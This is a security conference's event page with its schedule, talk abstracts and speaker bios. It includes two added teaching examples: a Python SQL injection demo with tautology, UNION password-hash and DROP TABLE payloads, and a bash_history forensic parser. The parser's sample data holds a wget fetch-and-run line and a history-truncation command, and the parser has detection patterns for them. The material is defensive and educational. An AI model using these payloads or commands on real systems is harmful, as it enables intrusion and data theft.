Event details
When: April 16, 2016
Where:
Hilton Garden Inn New Orleans Convention Center, 1001 South Peters Street, New Orleans, LA 70130
Note: The venue is a 5-10 minute walk from the French Quarter
Cost: $15
Registration
Register on the event's Eventbrite page.
CFP
The CFP is now closed. Thanks to all who submitted!
CFP Reviewers:
- Andrew Case
- Dr. Vico Marziale
- Joe Sylve
Schedule
8:45 - Opening Remarks
9:00 - Keynote: When Running Away Isn't an Option: How to Win a Gun Fight When You Only Have a Knife (Darren Van Booven, CISO, Idaho National Laboratory)
10:00 (three concurrent tracks)
- The iOS of Sauron - How iOS Tracks Everything You Do (Sarah Edwards)
- Finding a Kernel in a Haystack (Candice Quates)
- Proactive Threat Detection on Windows Systems (Devon Kerr)
10:50 - Break
11:00
- Minding the Metacognitive Gap (Chris Sanders)
- Defining “Reasonable Security” in 2016 (David Stampley)
- Dissecting Windows Host Analysis (Wes Riley)
12:00 - Lunch
1:00
- Database Forensics without the Database (Matt Bromiley)
- DFIR for LEO (Stephen Villere)
- You Don't Know Jack About bash_history (Hal Pomeranz)
1:50 - Break
2:00
- Facilitating Fluffy Forensics 2.0 (Andrew Hay)
- Data Protection Law in a Nut Shell (Brian Roux)
2:50 - Afternoon Break
3:10
- The Web's Most Wanted (Joshua Barone)
- Logging for Hackers, How we catch commodity and advanced malware (Michael Gough)
4:00 - Break
4:10
- IoT Hacking: Internet of "Embedded Systems" Hacking (Jeremy Allen)
- Hunt Like a Dentist in Zimbabwe (Jay DiMartino)
5:00 - Closing Remarks
Keynote Presentation
When Running Away Isn't an Option: How to Win a Gun Fight When You Only Have a Knife
Darren Van Booven, CISO, Idaho National Laboratory
Abstract
Conventional wisdom says you shouldn't bring a knife to a gun fight; however, you can tip the odds in your favor by knowing how to use the tools you have, understanding your adversary, and knowing your own weaknesses. This talk focuses on some recent hints at what is yet to come in the digital threat landscape by looking at some recent technical exploits, drawing upon experience with real cyber operations, to help illustrate the bigger picture. Questions such as "Where are we headed?", "What kinds of tools are needed?", "What are we to do?" and others will be explored from the perspective of someone who used to be the APT.
Biography
Darren Van Booven is responsible for the cyber security program at the Idaho National Laboratory (INL). He is currently focused on industrial control system risk, application vulnerability management, and the insider threat. Darren has over 18 years of information security experience in roles in both government and the private sector. Before INL he was CISO at the U.S. House of Representatives and spent eight years at the Central Intelligence Agency as a senior staff operations officer leading offensive cyber operations targeting against really bad people and performing incident response to nation state threats.
Research Presentations
Database Forensics without the Database - Matt Bromiley - @505Forensics
Databases. You have them; attackers want them. It's where all the good stuff sits. Let's make sure we're defending them the best we can!
In this talk, we're going to introduce and/or improve database forensics in your incident response workflow. Only, we're not going to touch the database. Through analysis of various artifacts, we're going to show you how to build a timeline of attacker activity and discover what may have happened to your data while it was exposed. We're also going to release new research and tools that can be used immediately to include database forensics in your next case.
Data Protection Law in a Nut Shell: From US Data Breach Notification to the EU Safe Harbor - Brian Roux - @digitalinquest
Government regulation of data practices is evolving both domestically and abroad. The US is focusing on data breaches and security practices while the EU is focusing on data privacy and consent. This talk will give an overview of recent and forthcoming changes that impact business practices domestically and abroad.
Defining “Reasonable Security” in 2016 - David Stampley
In 2015, the definition of “reasonable security” was affected by major developments, including a case upholding the FTC’s authority to prosecute unreasonable security practices as unfair trade practices, and another case allowing consumers to go forward in suing a major retailer for a security breach. Last year also saw increased enforcement activity from other federal agencies as well as state attorneys general. These developments help clarify some baseline requirements for security practices. The broader effect of the developments is to emphasize the attention organizations must pay to their security programs—who must have one, what it should look like (minimally), and who can bring enforcement actions for failures.
DFIR for LEO - Stephen Villere
Learn from a local law enforcement forensics lab manager how local law enforcement handles forensics investigations and the challenges faced while acquiring and processing evidence. DFIR becomes vastly different when suspects do not cooperate and locked devices and encryption can stop you in your tracks.
Don't let Crypto be your Cryptonite! -Martin Borugh - @hackerNinja
Do you know when to use AES over 3DES? Which AES mode should you use? Is it OK to just use OFB/CFB? Diffie-Hellman who? These answers and much more in a 45-minute walk-through of the crypto you use every day but may not know how or why.
Dissecting Windows Host Analysis - Wes Riley - @RSA
Attackers often take a systematic approach to determine vulnerabilities within interactions between various modules and processes. As incident responders, we can take a similar approach when conducting host triage analysis. In this talk, we will look at some key aspects of the Windows OS from a modular perspective and identify critical choke-points that assist IR personnel in identifying intrusions more efficiently.
Facilitating Fluffy Forensics 2.0 - Andrew Hay - @andrewsmhay
Cloud computing enables the rapid deployment of servers and applications, dynamic scalability of system resources, and helps businesses get products to market faster than ever before. Most organizations are aware of the benefits of adopting cloud architectures and many are becoming aware of the potential security risks. The majority of organizations, however, don’t realize the numerous challenges of conducting incident response (IR) activities and forensic investigations across public, private, and hybrid cloud environments.
It’s not all doom and gloom, however. The consumption model of cloud architectures actually lends itself to helping investigators conduct forensic and IR exercises faster and more efficiently than on a single workstation. For this to happen, however, the tools and techniques employed must evolve.
In this session, DataGravity CISO Andrew Hay will revisit the forensic and IR challenges of investigating servers and applications in cloud environments in addition to the opportunities that cloud presents to help expedite forensic investigations.
Finding a Kernel in a Haystack - Candice Quates - @candicenonsense
A talk about the contents of your graphics card and what you might find there. How and why to acquire memory from NVIDIA GPUs, and analyze the output. I will share some early-stage analysis techniques and results. Light analysis of cudaHashcat and other neat stuff.
Hunt Like a Dentist in Zimbabwe - Jay DiMartino
You too can hunt like a dentist for your own "Cecil the Lion". Go from hunted to hunter using your own hands. It's time to reclaim your networks and start hunting big-game APT armed with the pattern-matching Swiss Army knife called YARA. Learn how to author YARA rule signatures with techniques used by malware researchers to mercilessly hunt down elusive advanced threat actors, and how to apply those signatures in your organization or investigations using YARA.
IoT Hacking: Internet of "Embedded Systems" Things Hacking - Jeremy Allen - @bitexploder
Carve has been hacking IoT devices since... well, before they were called "IoT"! I will walk you through some of the coolest bugs we've responsibly disclosed to OEMs (that have now been fixed) and some of our testing methodology. Believe us: we're tired of raising the alarm about IoT insecurity, too. So instead, we're going to show you how to test your own IoT devices and some attack surface that you (maybe) didn't even know was there! We'll also talk about how to set up your networks to minimize the risk from devices that you don't trust which, of course, includes some "what not to do" case studies. We will cover software and hardware hacking as entertainingly as possible.
Logging for Hackers: How we catch commodity and advanced malware with this method, if only retailers did this, and how you can start doing it - Michael Gough - @HackerHurricane
Commodity malware, retail PoS and advanced attacks are hitting enterprises more often than ever before. When such an attack hits your organization, can you detect it in one hour? One day? What if I were to tell you that I could compromise your backup, management and anti-virus software and utilize them to persist after reboot? What if I were to then show you how we detected this type of attack with adequately configured Windows logs? This talk will cover what tools and methods worked well and what you can start doing today to improve your detection and incident response capabilities, how commodity malware like Dridex and APT malware like Winnti were detected, and how many of the retail PoS breaches could easily have been detected.
Minding the Metacognitive Gap - Chris Sanders - @chrissanders88
As security investigators, even those of us with a great deal of experience aren’t very good at identifying how we perform our jobs successfully. Our inability to understand our own thought processes can be defined as a lack of metacognitive awareness, and it negatively impacts our ability to perform investigations efficiently and to train new apprentice investigators. In this presentation, I’ll discuss the metacognitive gap as it relates to security investigators. This will include a discussion of dual process theory and the role of intuitive and reflective thinking, as well as modern research techniques such as eye gaze tracking that can help us become better as investigators and build better tools to support our endeavors.
This talk will be applicable to new and experienced practitioners. While I won’t be speaking about bits and bytes, my hope is that discussing matters of the mind will yield discourse that encourages you to become more aware of your own thought processes and to challenge the way you approach investigations.
The iOS of Sauron - How iOS Tracks Everything You Do - Sarah Edwards - @iamevltwin
iOS devices have the ability to track everything the user does - how many steps the user takes, where the user has been, and keeps track of how they use their devices.
This presentation will dive into some of the protected files that keep track of every detail of a user’s life that iOS tracks. These databases and files can be used to correlate user activity down to the smallest detail.
Methods of analysis as well as some scripts will be shown to help analyze these files.
The Web's Most Wanted - Joshua Barone - @tygarsai
The Open Web Application Security Project (OWASP) is a highly respected source for learning about web application vulnerabilities and security practices. They also publish a top ten list that tracks and ranks the most critical web application security flaws. The number one item on this list has consistently been injection attacks. We will be taking an in-depth look at one of these injection vectors, SQL Injection. To understand this attack vector, we will be looking at the following:
- What is it
- How does it work
- A look at variants
- What can developers and security practitioners do to defend
Live demos will show these attacks in action, as well as how critical the impact of these attacks can be. We will also look at common mistakes that developers make that accidentally bypass the protection methods that are used in various frameworks.
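As an added illustration of the abstract above (example code written for this page, not material from the talk or its speaker), the following Python runs the classic SQL injection payloads against an in-memory SQLite database and shows four things side by side: the vulnerable string-built query, the parameterized query that neutralizes the same payloads, the common "looks parameterized but is not" mistake that silently bypasses a framework's protection, and an allowlist for the one place placeholders cannot help (identifiers such as an ORDER BY column). The users table, its three rows and the payload strings are constructed for the demo.

```python
import sqlite3
from typing import Dict, List, Tuple

# Constructed demo data; a real application would hold far more than three rows.
SEED_USERS = [("alice", "h1", "admin"), ("bob", "h2", "user"), ("carol", "h3", "user")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)", SEED_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    # VULNERABLE: user input is pasted into the SQL text, so a quote character
    # in the input changes the structure of the query, not just a value.
    sql = "SELECT username, role FROM users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    # SAFE: the driver binds the value separately; it can never become SQL.
    return conn.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def lookup_false_sense_of_safety(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    # Common framework mistake: the parameterized API is called, but the
    # placeholder was already filled by Python string formatting. The driver
    # receives finished SQL plus an empty parameter tuple, so nothing is bound.
    sql = "SELECT username, role FROM users WHERE username = '{}'".format(username)
    return conn.execute(sql, ()).fetchall()


ALLOWED_SORT_COLUMNS = {"username", "role"}


def list_users_sorted(conn: sqlite3.Connection, sort_by: str) -> List[Tuple]:
    # Placeholders bind values, not identifiers, so a column name taken from a
    # request has to be checked against an allowlist before it touches the SQL.
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return conn.execute(f"SELECT username FROM users ORDER BY {sort_by}").fetchall()


def demo() -> Dict[str, object]:
    """Run every variant against the same payloads and return the results."""
    conn = make_db()
    tautology = "' OR '1'='1"  # turns the WHERE clause into "always true"
    union = "x' UNION SELECT username, password_hash FROM users --"  # reads a column the query never exposed
    try:
        list_users_sorted(conn, "username; DROP TABLE users")
        sort_rejected = False
    except ValueError:
        sort_rejected = True
    return {
        "vulnerable_tautology": lookup_vulnerable(conn, tautology),
        "vulnerable_union": lookup_vulnerable(conn, union),
        "parameterized_tautology": lookup_parameterized(conn, tautology),
        "parameterized_real_user": lookup_parameterized(conn, "bob"),
        "false_safety_tautology": lookup_false_sense_of_safety(conn, tautology),
        "sort_rejected": sort_rejected,
        "sorted_first": list_users_sorted(conn, "username")[0],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The tautology payload makes the vulnerable and the "false safety" variants return every row, while the parameterized lookup returns nothing because the whole string is compared as a username. The UNION payload shows why even a read-only query matters: it returns password hashes from a query that only ever selected usernames and roles.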
You Don't Know Jack About bash_history - Hal Pomeranz - @hal_pomeranz
The .bash_history file tracks a user's command history and is an important artifact in Linux and Mac forensics. But many investigators don't understand the rules for how and when it is written and can make wrong investigative assumptions. Suspects may attempt anti-forensic techniques to corrupt or remove .bash_history content. In other words, "It's complicated".
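An added worked example of the artifact the abstract refers to, written for this page in Python and not taken from the talk or its speaker. It assumes two documented bash behaviours: when HISTTIMEFORMAT is set, bash writes a "#<epoch seconds>" line in front of each command in the file (and nothing at all when it is unset), and bash normally rewrites the file from its in-memory list when the shell exits. The second point is why deleting or truncating .bash_history mid-session is often self-defeating: the deleting command itself survives in the file written at exit, so the parser flags those. Commands that prevent the write (unset HISTFILE, HISTSIZE=0, history -c) usually do not appear in the file from the shell that ran them; for those the tell is an empty or stale history next to evidence of a login elsewhere. The sample history, including its IP address, is constructed.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional, Tuple

# Constructed sample .bash_history. With HISTTIMEFORMAT set, bash precedes each
# command with a "#<epoch seconds>" line; the trailing "id" line (no timestamp)
# is what a shell without HISTTIMEFORMAT appends, the default on most installs.
SAMPLE_HISTORY = """\
#1460800000
ls -la /var/www
#1460800042
wget http://198.51.100.7/x.sh -O /tmp/.x
#1460800043
chmod +x /tmp/.x; /tmp/.x
#1460800900
cat /dev/null > ~/.bash_history
#1460800010
uptime
id
"""

# bash's timestamp record. A typed comment such as "#123" is written the same
# way and cannot be told apart in the file.
TS_LINE = re.compile(r"^#(\d+)$")

# Anti-forensic commands worth flagging; see the lead-in for which ones survive.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("history file removed or truncated",
     re.compile(r"(?:\brm\b|\bshred\b|>)[^;|&]*?\.bash_history\b")),
    ("history file redirected",
     re.compile(r"\bHISTFILE\s*=|\bunset\s+HISTFILE\b|\bln\s+-s[^;|&]*\.bash_history\b")),
    ("in-memory history cleared or disabled",
     re.compile(r"\bhistory\s+-c\b|\bHISTSIZE\s*=\s*0\b|\bset\s+\+o\s+history\b")),
]


@dataclass
class Entry:
    command: str
    timestamp: Optional[int] = None  # epoch seconds from the preceding "#<epoch>" line, if any


def parse_history(text: str) -> List[Entry]:
    """Turn raw .bash_history text into (command, optional timestamp) entries."""
    entries: List[Entry] = []
    pending: Optional[int] = None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = TS_LINE.match(line)
        if m:
            pending = int(m.group(1))  # applies to the next command line only
            continue
        entries.append(Entry(command=line, timestamp=pending))
        pending = None
    return entries


def out_of_order(entries: List[Entry]) -> List[int]:
    """Indices whose timestamp is earlier than the previous timestamped entry.

    One shell writes its list in order, so a backwards jump usually means two
    sessions appended to the same file (histappend) or the file was edited;
    either way the file is not a single linear session.
    """
    bad, last = [], None
    for i, e in enumerate(entries):
        if e.timestamp is None:
            continue
        if last is not None and e.timestamp < last:
            bad.append(i)
        last = e.timestamp
    return bad


def find_indicators(entries: List[Entry]) -> List[Tuple[int, str]]:
    """(index, label) for every entry matching an anti-forensic pattern."""
    hits = []
    for i, e in enumerate(entries):
        for label, pat in INDICATORS:
            if pat.search(e.command):
                hits.append((i, label))
                break
    return hits


def timeline(entries: List[Entry]) -> List[str]:
    """Human-readable lines; entries without a timestamp are marked as such."""
    rows = []
    for e in entries:
        when = ("(no timestamp)" if e.timestamp is None
                else datetime.fromtimestamp(e.timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"))
        rows.append(f"{when}  {e.command}")
    return rows


if __name__ == "__main__":
    ents = parse_history(SAMPLE_HISTORY)
    for row in timeline(ents):
        print(row)
    print("out-of-order entries:", out_of_order(ents))
    print("anti-forensic indicators:", find_indicators(ents))
```

Run against a real file, the two anomaly checks are the ones to read first: an out-of-order timestamp tells you the file is a merge of sessions rather than a single sequence, and a truncation command near the end of the file tells you the attacker tried to clean up and the shell wrote the file afterwards anyway.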
Speaker Bios
Andrew Hay - CISO - DataGravity
Andrew Hay is the CISO at DataGravity where he advocates for the company’s total information security needs and is responsible for the development and delivery of the company’s comprehensive information security strategy. Prior to that, Andrew was the Director of Research at OpenDNS (acquired by Cisco) and was the Director of Applied Security Research and Chief Evangelist at CloudPassage, Inc.
Brian Roux - Attorney - Hangartner, Rydberg & Terrell
Dr. Roux brings considerable technical expertise to the practice of law. Prior to becoming an attorney, he spent many years in private practice as a forensic computer scientist where he conducted investigations, addressed data breach containment, provided expert testimony, worked as a third party neutral, and served as a special master. He is a published author and public speaker on intersections of law, technology, ethics, and public policy with a special emphasis on digital forensics and cyber security related topics. Brian’s practice involves complex litigation, electronic discovery, data breaches, cyber liability, privacy law, and intellectual property. Brian is available to advise clients on potential cyber liability exposure, assist clients in responding to a cyber event or data breach, and defend clients in the eventual litigation that stems from such events.
Candice Quates
Candice Quates is an independent security researcher. Formerly affiliated with the University of New Orleans, she made sdhash fast and useful and rewrote the algorithm to work in CUDA. She spends her nights in the software consulting trenches.
Chris Sanders - Senior Analyst - FireEye
Chris Sanders is an information security author and researcher originally from Mayfield, Kentucky, now living in rural north Georgia. Chris is the manager of a detection and investigation research team at FireEye. He has extensive experience supporting government and military agencies, as well as several Fortune 500 companies. In multiple roles with the US Department of Defense, Chris helped to create several NSM and intelligence tools currently being used to defend the interests of the nation.
Chris has authored several books and articles, including the international best seller “Practical Packet Analysis”, currently in its second edition and in seven languages, and “Applied Network Security Monitoring” from Syngress. He holds multiple industry certifications, including the SANS GSE distinction, as well as a BS in Telecommunications and an MS in Homeland Security. He is currently pursuing a PhD in Cognitive Psychology in an attempt to enhance the field of security investigative technique through a better understanding of the human thought and learning processes.
Chris is also the founder and director of the Rural Technology Fund, a non-profit that donates thousands of dollars in scholarships and equipment annually to further technical education in rural and high poverty areas. The RTF is committed to building ten makerspace labs in public schools in 2016.
Chris blogs at http://www.chrissanders.org. You can learn more about the RTF at http://www.ruraltechfund.org.
David Stampley - Partner - KamberLaw
Dave Stampley has been described by a federal judge as an attorney with “recognized experience in complex litigation involving technology and privacy issues” and by security professionals as a lawyer who “gets it.” In 16 years practicing privacy and security law, Stampley has counseled companies about compliance and prosecuted them for non-compliance. As an assistant attorney general in the New York A.G.’s Internet Bureau, he led multistate coalitions in cases against DoubleClick, Ziff Davis Media, and Netscape. He served as privacy officer for a Fortune 1000 technology provider and as general counsel and consultant at Neohapsis. He is a CIPP and a partner at KamberLaw, where he litigates technology class actions. He began his legal career as a prosecutor in the Manhattan D.A.’s Office.
Hal Pomeranz - Principal - Deer Run Associates
Hal Pomeranz is an independent digital forensic investigator who has consulted on cases ranging from intellectual property theft, to employee sabotage, to organized cybercrime and malicious software infrastructures. He has worked with law enforcement agencies in the US and Europe and global corporations. While equally at home in the Windows or Mac environment, Hal is recognized as an expert in the analysis of Linux and Unix systems. Hal is a SANS Faculty Fellow and Lethal Forensicator, and is the creator of the SANS Linux/Unix Security track (GCUX). He holds the GCFA, GNFA, and GREM certifications and teaches the related courses in the SANS Forensics curriculum.
Jay DiMartino - Sr. Cyber Threat Researcher - Fidelis Cybersecurity
Jay DiMartino is a threat researcher for Fidelis Cybersecurity. He has been doing Malware Reverse Engineering for over 5 years and also has several industry certifications including the GREM and GCFA.
Jeremy Allen - Partner - Carve Systems
Jeremy started writing code for MUDs (Multi User Dungeons), the predecessors to MMORPGs, on a 66 MHz 486 running Slackware Linux in 1995, and he has never been the same since. Jeremy is responsible for conducting risk assessments, threat modeling, code reviews, application security assessments, research, and reverse engineering. He has discovered numerous critical flaws and bugs. He helps organizations by understanding their key risks and building security into their organization (through people, processes, and the technology stack). Jeremy has been an information security consultant for over 10 years. A similar version will be given at OWASP SnowFROC and potentially other locations. As stated earlier, we like to change things up a little bit when talking about IoT as it is always topical and we are always working on new devices. I have given talks at BSides before (iOS mobile stuff in ATL a while back, as I am an Atlanta native). I developed Mallory (https://github.com/CarveSystems/Mallory/) and gave a talk on it at BlackHat. I have been through a zillion information security talks at this point and I try to keep my talks on point, entertaining, and leave everyone in the audience with something useful after the fact. I really strive to have a talk with great content and a great presentation that captivates my audience and keeps them entertained for the length of my time slot.
Joshua Barone - Senior Developer - BlackBag Technologies
Joshua Barone has over 12 years of experience as a software developer, with a majority of that time specialized in security design and development. Joshua has a core background in Java, .Net, Python, and security design principles. He specializes in .Net and Java Enterprise technologies, Web Services, Agile Methodologies, Open Source, and Test-Driven Development. He is familiar with a variety of platforms (Windows, Mac OS X, Linux, Unix), databases (PostgreSQL, MySQL, MSSQL, Oracle), J2EE Application Servers, Software Development Methodologies and Tools. Joshua is also experienced in security vulnerability assessment for platforms and applications. Joshua is a Certified Information System Security Professional (CISSP) and holds GIAC Security Essentials (GSEC), Certified Incident Handler (GCIH), and Web Application Penetration Tester (GWAPT) certifications, as well as a Master's in Computer Science from the University of New Orleans. He is currently a Senior Developer at BlackBag Technologies.
Martin Borugh - Global Director of Cyber Security - TBWA World Wide
I was a cryptographic technician in the Marine Corps from 1999 to 2004. After the Marines I wanted to get some grass-roots work in IT to build up my overall knowledge. I worked as a sysadmin and worked my way up to IT Director over the past 16 years, concentrating my career path on information security. I have been doing consulting work with government agencies for many years. I am currently working on developing a new, unbreakable algorithm.
Matt Bromiley - Senior Consultant - Mandiant
Matt has over 4 years’ experience in incident response, digital forensics, and network security monitoring. His skills include disk, database, and network forensics, incident response/triage, and log analytics. Matt has helped organizations of all sizes with their forensic and IR needs. He also has a passion for Mac & Linux forensics, as well as building scalable analysis tools utilizing free and open source software. Matt’s passion for DFIR helps him explore new topics with hopes of addressing previously-unanswered questions.
When not jamming with the console cowboys in cyberspace, Matt can be found with his family, sometimes hidden in a cloud of sweet, delicious smoke of a Texas BBQ pit.
Michael Gough - Malware Archaeology LLC
Michael (CISSP, CISA and CSIH) is a Malware Archaeologist, Blue Team defender, Active Defender, Incident Responder, Information Security professional and logoholic. Michael developed the “Malware Management Framework” to improve malware discovery and detection and response capabilities. Michael also authored several Windows logging cheat sheets to help the security industry understand Windows logging, where to start and what to look for. Michael is co-developer of LOG-MD, a free tool that audits, sets, collects and reports on malicious Windows log data and malicious system artifacts. Michael’s responsible disclosures involve cardkey system exploits and vulnerabilities with leading security products. Michael’s background includes 20 years of security consulting for Fortune 500 organizations with HP, and for the health care, financial and gaming industries. Michael also ran BSides Texas for five years for the Austin, San Antonio, Dallas and Houston cons. Michael also blogs on HackerHurricane.com on various InfoSec topics.
Sarah Edwards -Digital Forensic Analyst/Mac Nerd - Parsons Corporation
Sarah is a senior digital forensic analyst who has worked with various federal law enforcement agencies. She has performed a variety of investigations including computer intrusions, criminal, counter‐intelligence, counter-narcotic, and counter‐terrorism. Sarah's research and analytical interests include Mac forensics, mobile device forensics, digital profiling and malware reverse engineering. Sarah has presented at many industry conferences including Shmoocon, CEIC, BSides*, Defcon and the SANS DFIR Summit. She has a Bachelor of Science in Information Technology from Rochester Institute of Technology and a Masters in Information Assurance from Capitol College. Sarah is the author of the SANS Mac Forensic Analysis Course - FOR518.
Wes Riley - Advisory IR Consultant - RSA
Jack "Wes" Riley is an Advisory Practice Consultant for the Incident Response / Discovery Practice at RSA. In this capacity, Wes is tasked with assisting clients in obtaining situational awareness and rapidly identifying threats as part of tactical response to intrusions. In addition, Wes performs threat research and develops content and techniques that can be used by clients to identify compromise. Wes has worked in DFIR since 2008, and has performed forensic and response work for the U.S. Army Corps of Engineers CIRT, DOD High Performance Computing, and Mississippi State University. Wes is also a former U.S. Army Signal Officer, having served with the 184th Expeditionary Sustainment Command, Camp Shelby, Mississippi.
Planners
Organizers:
Vico Marziale - @vicomarziale
Andrew Case - @attrc